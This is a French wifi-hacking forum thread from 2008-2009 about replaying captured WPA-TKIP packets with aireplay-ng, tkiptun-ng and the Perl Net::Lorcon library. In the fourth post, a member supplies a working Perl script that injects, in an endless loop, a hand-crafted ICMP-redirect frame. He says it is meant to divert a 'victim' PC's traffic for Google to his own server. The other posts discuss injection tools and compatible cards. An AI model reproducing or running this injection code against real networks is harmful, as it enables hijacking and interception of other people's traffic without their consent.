Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-12-2008 14:41:36

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Injection de paquets d'une capture airodump (.cap) en WPA TKIP

Bonjour à tous,

Je voudrais rejouer  une capture  airodump (.cap). J'ai capturé un paquet ARP chiffré en WPA TKIP via airodump et je voudrais rejouer ce paquet.
Par conséquent, j'ai utilisé aireplay-ng qui permet de rejouer une trace airodump mais aucun paquet sorts de l'interface wifi.
J'ai utilisé airtun-ng qui marche mais me rejoue ce paquet encapsulé dans du WEP. Je voudrai  plutôt qu'il me rejoue intégralement la capture de la capture sans modifier les paquets.
J'ai vu aussi  tcpreplay mais cet outil ne doit marcher qu 'au niveau IP je pense et non au niveau mac.

Je pense qu 'il ya des personnes a avoir deja tenté de rejouer des paquets d'une capture airodump en WPA TKIP.

Si vous avez des idées, n'hésitez pas.

Merci de votre aide

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-12-2008 18:38:40

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 355

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

Salut Riconaute, bienvenue sur le forum wink

Pour injecter ton arp, le tool dont tu as besoin est tout simplement aireplay-ng. Le mode

- -arpreplay : standard ARP-request replay (-3)

est meme fait pour ça, en principe ça devrait fonctionner, bien que ce mode soit généralement utilisé pour du WEP. Sinon, il existe un tool spécialement dédié au WPA TKIP, et qui pourrait aussi correspondre à tes besoins: tkiptun-ng. Ce tool n'est pas encore fonctionnel à 100%, donc il faut tester et voir ce que ça donne sur ton réseau.

Hors Ligne

#3 17-12-2008 10:51:33

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

Salut M1ck3y,

Merci pour cette réponse. l'utilisation de aireplay avec le parametre -arpreplay : standard ARP-request replay (-3) ne fonctionnne pas en wpa.
Par contre je suis en train de tester tkiptun-ng et j'essaye d'injecter mon paquet ARP (dans une trace .cap) chifré en WPA-TKIP.
C'est pas gagné...Si évolution du pb, je te tiens au courant...merci

Hors Ligne

#4 22-12-2008 23:37:33

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

salut
suite a une recherche similaire j'ai eu la même question et voici une réponse:
http://search.cpan.org/CPAN/authors/id/ … .02.tar.gz

après l'avoir installé regarde dans ../exemple/inject.pl il te suffit de recopier le code hexa de ton arp sauf pour le qos ou il est obligatoire de changer le canal si tu veux que ton paquet arrive chez ta victime
voici un exemple pour un icmp-redirect non encodé wpa mais qui aurais du l'être si le xor fourni par tkiptun avais été assez long ...vdm

use strict; use warnings;
use bytes;

BEGIN { 
  $ENV{'LORCON_IF'} = "mon0";
  $ENV{'LORCON_INJ'} = "iwlwifi";
};

use Net::Lorcon qw(:all);

my $tx = Net::Lorcon->new($ENV{LORCON_IF}, $ENV{LORCON_INJ});

# icmp-redirect pour rediriger mon pc victime du site google a mon serveur 
my $packet = "\x88\x01\x2c\x00\x00\x19\x7e\xb6\x7a\x98\x00\x19\x7e\xb6\x7a\x98\x00\x18\xde\x7b\x1c\x9c\x60\x00\x01\x00\xaa\xaa\x03\x00\x00\x00\x08\x00\x45\x00\x00\x22\x41\x18\x00\x00\x80\x01\x75\xfe\xc0\xa8\x01\x01\xc0\xa8\x01\x73\x05\x01\x3c\x1c\x5a\x0f\x1f\xb7\x45\x00\x00\x1c\x00\x00\x00\x00\xe8\x11\x00\x01\xc0\xa8\x01\x01\x42\x66\x09\x63\x00\x00\x00\x00\x00\x20\x01\x00";

!$tx->open && !$! && print "Open device\n";
$tx->setfunctionalmode(1);

while (1) {
   my $t = $tx->txpacket($packet);
   print "T: $t\n";
}

ta carte doit être compatible lorcon :
wlan-ng hostap airjack prism54 madwifing madwifiold rtl8180 rt2570 rt2500 rt73 rt61 zd1211rw bcm43xx d80211 ath5k iwlwifi (rtl8187)

Dernière modification par seb-taz (22-12-2008 23:40:22)

Hors Ligne

#5 07-01-2009 14:01:38

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

Merci seb-taz pour ta réponse..J'ai rapidement testé et ca avait l'air de marcher..

Dernière modification par Riconaute (08-01-2009 18:16:24)

Hors Ligne

#6 08-01-2009 18:13:12

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

Eh non cet outil ne réinjecte pas correctement les paquets en WPA TKIP. Ok pour l'injection de paquets non chiffré et  WEP mais pas en WPA. Cet outil force un bit apres le champs qos control field qui est celui reservé pour la declaration de la sécurité utilisée. De telle sorte que le paquet injecté est considéré toujours comme du WEP. Il y a un champ fixe que l'on ne peut pas modifier.
Seb-taz ou Mick3y, connaissez vous des outils similaires (à "Net-Lorcon") svp?

Hors Ligne

#7 08-01-2009 19:12:25

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

salut
j'ai eu des problèmes avec l'alfa peut être que tu utilise cette carte toi aussi ?
en tout cas mes paquets injectés par la intel 3945 sont bien reconnu wpa par wireshark depuis mon pc cible mais si tu trouve mieux je suis preneur aussi 

a+

Hors Ligne

#8 09-01-2009 09:58:32

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

Salut,
je possède une carte cisco avec un chipset atheros. Par conséquent, j'utilise les drivers madwifi. Je ne les ai pas mis a jour car par défaut  BT3 dispose deja des drivers.

Hors Ligne

#9 21-01-2009 08:57:16

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Injection de paquets d'une capture airodump (.cap) en WPA TKIP

salut, c'est bon, j'ai acheté une carte broadcom wpc54g et ca marche. Merci.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 224 26-11-2016 00:02:49 par koala
3 340 14-08-2016 10:22:07 par MiscL
10 427 29-07-2016 18:10:03 par M1ck3y
Problème airodump-ng par Skriix94
5 678 11-07-2016 23:14:38 par kcdtv
airodump-ng par david_01
5 384 11-07-2016 17:56:29 par david_01

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]